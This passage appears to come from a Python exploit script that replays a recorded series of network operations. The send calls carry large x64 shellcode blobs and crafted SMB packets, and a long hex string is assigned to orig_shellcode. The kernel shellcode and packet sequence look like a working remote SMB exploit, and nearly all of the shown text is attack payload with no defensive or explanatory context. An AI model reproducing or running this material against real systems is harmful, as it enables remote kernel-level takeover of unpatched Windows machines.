H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 20, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 21, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('close', 3, 9.967667061999236)\", \"('close', 4, 0.0)\", \"('close', 5, 0.0)\", \"('close', 6, 0.0)\", \"('close', 7, 0.0)\", \"('close', 8, 0.0)\", \"('close', 9, 0.0)\", \"('close', 10, 0.0)\", \"('close', 11, 0.0)\", \"('close', 12, 0.0)\", \"('close', 13, 0.0)\", \"('close', 14, 0.0)\", \"('close', 15, 0.0)\", \"('close', 17, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00#\\\\xffSMBq\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('close', 18, 0.0)\", \"('close', 19, 0.0)\", \"('close', 20, 0.0)\", \"('close', 21, 0.0)\", \"('recv', 1, 0.0)\", '(\\'send\\', 1, b\"\\\\x00\\\\x00\\\\x00\\'\\\\xffSMBt\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x02\\\\xff\\\\x00\\'\\\\x00\\\\x00\\\\x00\", 0.0)', \"('recv', 1, 0.0)\", \"('close', 1, 0.0)\"]\r\n datfile = [ast.literal_eval(i) for i in datfile]\r\n orig_shellcode = binascii.unhexlify(b'31c040907408e809000000c22400e8a7000000c3e801000000eb905bb9760100000f32a3fcffdfff8d431731d20f30c3b9230000006a300fa18ed98ec1648b0d400000008b6104ff35fcffdfff609c6a23529c6a0283c2089d804c2401026a1bff350403dfff6a0055535657648b1d1c0000006a3b8bb324010000ff3331c04889038b6e286a0183ec4881ed9c020000a1fcffdfffb97601000031d20f30fbe811000000fa648b0d400000008b610483ec289d61c3e9ef000000b9820000c00f3248bbf80fd0ffffffffff8953048903488d050a0000004889c248c1ea200f30c30f01f865488924251000000065488b2425a801000050535152565755415041514152415341544155415641576a2b65ff34251000000041536a33514c89d14883ec08554881ec58010000488dac248000000048899dc00000004889bdc80000004889b5d000000048a1f80fd0ffffffffff4889c248c1ea204831dbffcb4821d84831c9b9820000c00f30fbe838000000fa65488b2425a80100004883ec78415f415e415d415c415b415a415941585d5f5e5a595b5865488b2425100000000f01f8ff2425f80fd0ff31c040900f84b5050000e800000000586089c389e583ec48648b0d38000000668b4106c1e010668b01662500f08b086681f94d5a74072d00100000ebf08945fc5389c3b9940169e3e83e0100008945f8b9855483f0e8310100008945f4b92e5b51d2e8240100008945ec5b8d55e831c9890a526a00526a0bffd08b55e885d20f8402010000526a00ff55f885c00f84f4000000506a00ff75e8506a0bff55ec85c00f85e000000058502dfc000000051c01000050e880010000b9fa3cadc239c8741eb91abd4b2b39c87415588b55e881ea1c0100000f8cac0000008955e8ebce588b70ecff55f489f05050682e6461746a61e82702000085c00f84880000005883e940e85a02000085c074158b16c1ea1889f0c1e81839d075078b464885c0740a83c60483e904e35eebd88975f05668f80f00006a00ff55f885c0744a5089c731c089c16681c10004f3ab5889008b550489500431d78b55f889500831d78b55f489500c31d78b55f089501031d789782483c04889c78db396030000b91a020000f3a45b89433889ec61c3535251575589e583ec1889cf89d88945fce87a00000085c0746d8945f8e8ee0000008945f48b45fc8b4df8e80e01000085c074538945f08b45fc8b4df8e80401000085c074418945ec8b45fc8b4df8e8fa00000085c0742f8945e88b45fc89f98b55ec8b5df4e8ab00000085c0741889c18b45e8e8dd0000006689c28b45fc8b4df0e8d700000083c4185d5f595a5bc35689c683c63c8b3601c666813e5045750983c6788b3601f05ec331c0ebfa56515789c631c089c7c1e70729c789f831c98a0e80f900740501c846ebe95f595ec356575289c631c089c7c1e70729c789f831d28a1601d046e2ee5a5f5ec356515789c631c089c7c1e70729c789f831c98a0e80f90074c601c84646ebe85f595ec383c0188b00c357565131ff89c639df74198b04ba01f0e883ffffff39c8740747ebeb595e5fc389f8ebf831c0ebf483c11c8b0901c8c383c1208b0901c8c383c1248b0901c8c3d1e101c8668b00c381e2ffff0000c1e20201d18b0901c8c352568b74240c8b4c241031d2d1e985c9740cc1c205ac460c2030c249ebf089d05e5ac20800585a5f5e505689f083c63c8b3601c631c089c1668b4e06668b461401c683c61885c9741d8b0639f875078b460439d0740683c62849ebe98b460c8b4e085e01c6c331f6c36031c083f80f741e31c98b3c868b148e39d774034175f30fb694038703000039d1750d40ebdd4139c875056131c040c36131c0c3000102030405060708090a09090d0e8b4c240860e8000000005d6681e500f0894d34e8d9010000e843010000e87f01000085c00f84e30000008b5d3c8b4bd8e8170100003c23740d3c77741c3cc87422e9b60000008b4d388b452489410e31c0884112e99f000000e813010000e9b50000008b5d3c8b43e88b303375288b7808337d288b40043345283b431089c3757b8b